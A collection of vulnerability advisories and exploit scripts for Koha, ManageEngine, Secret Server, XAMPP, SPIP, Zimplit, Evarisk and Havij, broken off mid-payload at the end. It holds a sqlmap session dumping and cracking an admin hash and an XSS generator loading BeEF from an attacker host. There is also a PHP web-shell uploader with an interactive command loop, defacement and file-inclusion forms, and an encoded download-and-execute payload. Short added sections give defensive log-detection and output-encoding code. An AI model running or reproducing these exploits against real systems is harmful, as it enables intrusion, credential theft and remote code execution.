      Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
      Contact: cst@sba-research.org

      #### References:
      http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
      http://koha-community.org/security-release-koha-3-20-1/
      http://koha-community.org/security-release-koha-3-18-8/
      http://koha-community.org/security-release-koha-3-16-12/

      #### Description: ####
      By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

      #### Proof-of-concept: ####

      1. Inspect Koha database schema

      Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

      So basically we need to execute some SQL statement like this:

      ```
      sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
      ```

      2. Query the database with sqlmap

      So let's fire up sqlmap with the --sql-shell parameter and input the query:

      ```
      root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4

               _
       ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
      |_ -| . | |     | .'| . |
      |___|_  |_|_|_|_|__,|  _|
            |_|             |_|   http://sqlmap.org

      [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 09:20:07

      [09:20:07] [INFO] testing connection to the target URL
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      ---
      Parameter: number (GET)
          Type: AND/OR time-based blind
          Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
          Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
      ---
      [09:20:09] [INFO] testing MySQL
      [09:20:09] [INFO] confirming MySQL
      [09:20:09] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Debian
      web application technology: Apache 2.4.10
      back-end DBMS: MySQL >= 5.0.0
      [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
      sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
      [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
      [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
      [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
      [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
      admin
      [09:21:46] [INFO] retrieved: $2a$08$taQ
      [09:23:33] [ERROR] invalid character detected. retrying..
      [09:23:33] [WARNING] increasing time delay to 5 seconds
      afOgEEhU
      [09:25:10] [ERROR] invalid character detected. retrying..
      [09:25:10] [WARNING] increasing time delay to 6 seconds
      t/gW
      [09:26:13] [ERROR] invalid character detected. retrying..
      [09:26:13] [WARNING] increasing time delay to 7 seconds
      TOmqnYe1Y6ZNxCENa
      [09:29:57] [ERROR] invalid character detected. retrying..
      [09:29:57] [WARNING] increasing time delay to 8 seconds
      2.ONk2eZhnuEw5z9OjjxS
      [09:35:08] [ERROR] invalid character detected. retrying..
      [09:35:08] [WARNING] increasing time delay to 9 seconds
      select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
      ```

      3. Feed john the ripper and be lucky

      ```
      root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
      root@kali:/home/wicked# john ./admin-pass
      Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
      admin            (?)
      guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
      Use the "--show" option to display all of the cracked passwords reliably
      root@kali:/home/wicked# john ./admin-pass --show
      ?:admin

      1 password hash cracked, 0 left
      ```

      4. Log in with username "admin" and password "admin" ;)

      ### CVE-2015-xxxx ###

      #### Title: ####
      Unauthenticated SQL Injection

      #### Type of vulnerability: ####
      SQL Injection vulnerabilities in Koha staff client allow attackers to read arbitrary data from the database.

      ##### Exploitation vector:
      The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

      ##### Attack outcome:
      An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.

      #### Impact: ####
      critical

      #### Software/Product name: ####
      Koha

      #### Affected versions: ####
      * <= Koha 3.20.1
      * <= Koha 3.18.8
      * <= Koha 3.16.12

      #### Fixed in version: ####
      * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
      * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
      * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

      #### Vendor: ####
      http://koha-community.org/ (Open Source)

      #### CVE number: ####
      CVE-2015-xxxx

      #### Timeline ####
      * `2015-06-18` identification of vulnerability
      * `2015-06-18` 1st contact to release maintainer, immediate reply
      * `2015-06-23` new release with fixed vulnerabilities

      #### Credits: ####
      RGhanad-Tavakoli@sba-research.org

      ---
      Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
      Contact: cst@sba-research.org

      #### References:
      http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
      http://koha-community.org/security-release-koha-3-20-1/
      http://koha-community.org/security-release-koha-3-18-8/
      http://koha-community.org/security-release-koha-3-16-12/

      #### Description: ####
      By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

      #### Proof-of-concept: ####

      ```
      echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

      echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
      ```
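      The three Koha advisories in items 8 to 10 leave distinctive traces in the web server's access log: a time-based payload (PROCEDURE ANALYSE / BENCHMARK) in the number parameter of opac-tags_subject.pl, dot-dot segments in template_path, and script tags in list parameters. The following is an added example, not part of the advisories or of Koha, showing detection logic run over constructed Apache access-log lines that mirror those PoCs; the rule names and log lines are this example's own.

      ```python
      """Added example, not from the advisories: scan Apache access-log lines for the
      request shapes the Koha advisories describe. The sample log lines are constructed."""
      import re
      from urllib.parse import parse_qs, unquote, urlsplit

      # Apache common log format: %h %l %u %t "%r" %>s %b
      LOG_RE = re.compile(
          r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
      )
      # Time-based blind SQLi primitives, including the PROCEDURE ANALYSE form sqlmap used above.
      TIME_BASED_SQLI = re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(|PROCEDURE\s+ANALYSE", re.I)
      SCRIPT_INJECTION = re.compile(r"<\s*script\b|javascript\s*:", re.I)


      def decode_fully(value: str, max_rounds: int = 3) -> str:
          """parse_qs decodes once; repeat so double-encoded payloads are seen too."""
          for _ in range(max_rounds):
              decoded = unquote(value)
              if decoded == value:
                  break
              value = decoded
          return value


      def classify(line: str):
          """Return [(rule, detail), ...] for one log line; [] if nothing matched or unparsable."""
          m = LOG_RE.match(line)
          if not m:
              return []
          url = urlsplit(m["target"])
          findings = []
          for key, values in parse_qs(url.query, keep_blank_values=True).items():
              for raw in values:
                  value = decode_fully(raw)
                  if key == "template_path" and ("../" in value or value.startswith("/")):
                      findings.append(("path traversal (CVE-2015-4632)", f"{url.path} {key}={value}"))
                  if url.path.endswith("/opac-tags_subject.pl") and key == "number" and TIME_BASED_SQLI.search(value):
                      findings.append(("time-based SQLi (CVE-2015-4633)", f"{url.path} {key}={value[:60]}"))
                  if SCRIPT_INJECTION.search(value):
                      findings.append(("script injection (CVE-2015-4631)", f"{url.path} {key}={value[:60]}"))
          return findings


      def scan(log_text: str):
          """Return [(line_number, rule, detail), ...] over a whole log."""
          results = []
          for number, line in enumerate(log_text.splitlines(), start=1):
              for rule, detail in classify(line):
                  results.append((number, rule, detail))
          return results


      # Constructed sample log: lines 1-3 mirror the advisories' PoCs, line 4 is benign.
      SAMPLE_LOG = """\
      10.0.0.5 - - [25/Jun/2015:09:20:09 +0200] "GET /cgi-bin/koha/opac-tags_subject.pl?number=1%20PROCEDURE%20ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) HTTP/1.1" 200 5123
      10.0.0.5 - - [25/Jun/2015:09:31:02 +0200] "GET /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1871
      10.0.0.9 - - [25/Jun/2015:09:40:11 +0200] "GET /cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+%3Cscript+src%3D%27http%3A%2F%2Fexample.invalid%2Fx.js%27%2F%3E&sortfield=title HTTP/1.1" 302 0
      10.0.0.7 - - [25/Jun/2015:09:41:30 +0200] "GET /cgi-bin/koha/opac-search.pl?q=perl+programming HTTP/1.1" 200 9001
      """

      if __name__ == "__main__":
          for number, rule, detail in scan(SAMPLE_LOG):
              print(f"line {number}: {rule}: {detail}")
      ```

      Only the SQLi rule is tied to a script path; the traversal and script-tag rules fire on any endpoint, which matches the advisories' point that many parameters are affected.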
11. Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability

CVE-ID:
====================================
CVE-2015-2169

CVSS:
====================================
3.5

Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM) software that helps you monitor and manage assets in your network from Planning phase to Disposal phase. AssetExplorer provides you with a number of ways to ensure discovery of all the assets in your network. You can manage software & hardware assets, ensure software license compliance and track purchase orders & contracts - the whole nine yards! AssetExplorer is very easy to install and works right out of the box.
(Homepage: https://www.manageengine.com/products/asset-explorer/ )

Abstract Advisory Information:
==============================
A cross site scripting attack can be performed on the ManageEngine Asset Explorer. If the 'publisher' name contains a vulnerable script, it gets executed in the browser.

Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)

Severity Level:
====================
Medium

Technical Details & Description:
================================
Add a vendor with a script in it to the registry. Log in to the product and scan the endpoint where the registry is modified. In the right pane, go to Software -> Scanned Software. The script gets executed.

Vulnerable Product(s): ManageEngine Asset Explorer
Affected Version(s): Version 6.1.0 / Build Number 6112 (Earlier versions I did not test)
Vulnerability Type(s): Persistent Cross Site Scripting

PoC:
=======================
Add the following registry entry on the machine, for a targeted attack.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"

Security Risk:
==================
Medium.

Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)

Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
12. #############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID : CVE-2015-3443
# Product: Secret Server [1]
# Vendor: Thycotic
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
# Risk: High
# Effect: Remotely exploitable
# Author: Marco Delai (marco.delai@csnc.ch)
# Date: June 24th 2015
#
#############################################################

Introduction:
-------------
Thycotic Secret Server enterprise password management software allows the creation, management and control of critical passwords in one centralized, web-based repository [1].

The identified vulnerability (stored Cross-Site Scripting) allows the execution of JavaScript code in the browser of a valid user when they toggle the password mask on a specially crafted password. This allows, for example, an attacker to prepare a specially crafted shared password which, when read by another user, can steal all other passwords the victim has access to.

Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2].

Technical Details
--------------------
Exploiting the vulnerability simply requires to:

1. Create a new password entry within Secret Server with the following value:
   "Compass Security<script>alert("Compass Security")</script>"

2. Open the basic dashboard and toggle the password mask.

The password is retrieved from the server using an AJAX call and its value is added straight to the page's DOM without validation. Thus, the script included in step 1 is executed.

Note that the payload defined in step 1 only got executed in the basic dashboard view. The advanced dashboard did adequately encode the password.
Extract of the vulnerable page:

GET /SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&auditAction=unmask HTTP/1.1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 62
Content-Type: application/json; charset=utf-8
Expires: -1
[...]
Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self'; object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self'; object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-UA-Compatible: IE=edge

"Compass Security<script>alert(\"Compass Security\")</script>"

Remediation:
------------
Update Secret Server to the latest version, which fixes the vulnerability [2].

Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure

References:
-----------
[1] http://thycotic.com/products/secret-server/
[2] http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
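The ManageEngine finding (item 11) and the Secret Server finding (item 12) share one root cause: a string that originated as data (a registry Publisher value, a stored secret) is written into the page as markup. The Python below is an added example, not code from either advisory or vendor, showing the output encoding a defender applies at the point of rendering. The row and script templates, the function names and the sample values are constructed for the example.

```python
import html
import json

# Constructed sample values modelled on the two advisories: a registry
# "Publisher" string and a stored secret whose value carries markup.
SAMPLE_PUBLISHER = '<script> alert("XSS"); </script>'
SAMPLE_SECRET = 'Compass Security<script>alert("Compass Security")</script>'


def encode_html_text(value: str) -> str:
    """Encode for the HTML text context (between tags) or a quoted attribute.
    & < > " ' are replaced, so the browser shows the characters as text."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Encode for insertion as a JavaScript string literal (quotes included).

    json.dumps escapes quotes, backslashes and control characters; the extra
    replacements keep a literal '</script>' or '<!--' inside the data from
    terminating the surrounding script block.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_row_unsafe(publisher: str) -> str:
    """The vulnerable pattern: data concatenated straight into markup."""
    return '<td class="publisher">' + publisher + "</td>"


def render_row_safe(publisher: str) -> str:
    """Same row, value encoded for the HTML text context it lands in."""
    return '<td class="publisher">' + encode_html_text(publisher) + "</td>"


def render_unmask_script_safe(secret: str) -> str:
    """Secret handed to page script as a JS literal and assigned through
    textContent, the DOM sink that never parses markup (unlike innerHTML)."""
    return ("<script>document.getElementById('pw').textContent = "
            + encode_js_string(secret) + ";</script>")


def js_literal_roundtrips(value: str) -> bool:
    """Encoding is lossless: decoding the literal yields the original value."""
    return json.loads(encode_js_string(value)) == value
```

html.escape covers the text and double-quoted attribute contexts; a value that page script receives (the AJAX response in item 12) has to be treated as data on the client as well, which is what assigning it through textContent rather than inserting it as HTML achieves.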
13. source: https://www.securityfocus.com/bid/53979/info

XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
14. source: https://www.securityfocus.com/bid/53983/info

SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.

Exploit generator:
------------------

<html>
<head>
<script>
function trim(s){
    return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}

function encodeToHex(s){
    var r="";
    var h;
    for(var c=0;c<s.length;c++){
        h=s.charCodeAt(c).toString(16);
        while(h.length<3) h="%"+h;
        r+=h;
    }
    return r;
}

function generateXSS(){
    var target = trim(document.getElementById("target").value);
    var version = trim(document.getElementById("version").value);
    var content = trim(document.getElementById("content").value);

    var resultjs = "";
    resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
    resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
    resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
    resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";

    document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This XSS, non-persistent, uses POST vars through the admin panel.<br />
The target is the attribute "name" of a hidden input markup.<br />
This XSS works on Firefox 13 and IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
    <td>URL's SPIP Targeted :</td>
    <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
    <td>SPIP version :</td>
    <td>
        <select id="version" onchange="generateXSS();">
            <option value="base_repair">3.0.X (up to 3.0.1 included)</option>
            <option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
        </select>
    </td>
</tr>
<tr>
    <td>JavaScript code to execute :<br />(without &lt;script&gt; &amp; &lt;/script&gt; markup)</td>
    <td>
        <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
        </textarea>
    </td>
</tr>
<tr>
    <td>Exploit to send to an admin : </td>
    <td>
        <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea>
    </td>
</tr>
</table>
</form>
</body>
</html>
15. source: https://www.securityfocus.com/bid/53990/info

Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Zimplit CMS 3.0 is vulnerable; other versions may also be affected.

[1337day.com / Inj3ct0r banner: exploit database separated by exploit type (local, remote, DoS, etc.)]
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#########################################
I'm KedAns-Dz member from Inj3ct0r Team
#########################################

###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Exploit's / p0c's ====>

##### Exp(1) Arbitrary File/Shell Upload =>

<!-- p0c (1) -->
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    return $resp;
}

print "\n|==================================================|";
print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |";
print "\n|==================================================|\n";

if ($argc < 2)
{
    print "\nUsage : php $argv[0] [host] [path]";
    print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$data = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";

$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";

define(STDIN, fopen("php://stdin", "r"));

while(1)
{
    print "\n Inj3ct0rK3d-Sh3lL#";
    $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
    if ($cmd != "exit")
    {
        $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
        $packet.= "Host: {$host}\r\n";
        $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
        $packet.= "Connection: close\r\n\r\n";
        $output = http_send($host, $packet);
        if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
        $shell = explode("_code_", $output);
        print "\n{$shell[1]}";
    }
    else break;
}
?>

<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>

[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*

##### Exp(2) Edit HTML (index.html) File =>

<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center> <h1> HaCked By KedAns-Dz </h1> </center>
</textarea>
<input type='submit' value='Edit HTML Page'>
</form>

##### Exp(3) Add new HTML File/Page =>

<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center> <h1> HaCked By KedAns-Dz </h1> </center>
</textarea>
<input type='submit' value='Creat new HTML Page'>
</form>

##### Exp(4) Local File Include =>

<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Included Local File'>
</form>

<!-- p0c (2) -->
<?php
$lfi = curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS, array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>

<!-- p0c (3) -->
<?php
$lfi = curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS, array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>

#### << ThE|End

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================
16. source: https://www.securityfocus.com/bid/53994/info

Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Evarisk 5.1.5.4 is vulnerable; other versions may also be affected.

<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
17. #!/usr/bin/php
<?php
# Title : Havij OLE Automation Array Remote Code Execution
# Affected Versions: All Version
# Founder : ITSecTeam
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# OleAut32.dll Exploit MS14-064 CVE2014-6332
#
#
# 1 . run php code : php havij.php
# 2 . open "Havij" and Enter your exploit link http://ipaddress:80/
# 3 . go to "Setting" and Click "Load Cookie"
# 4 . Your Link Download/Execute on your target
# 5 . Finished ;)

#Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY

$port=80; # Port Address
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link

$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);

print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";

$msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt 
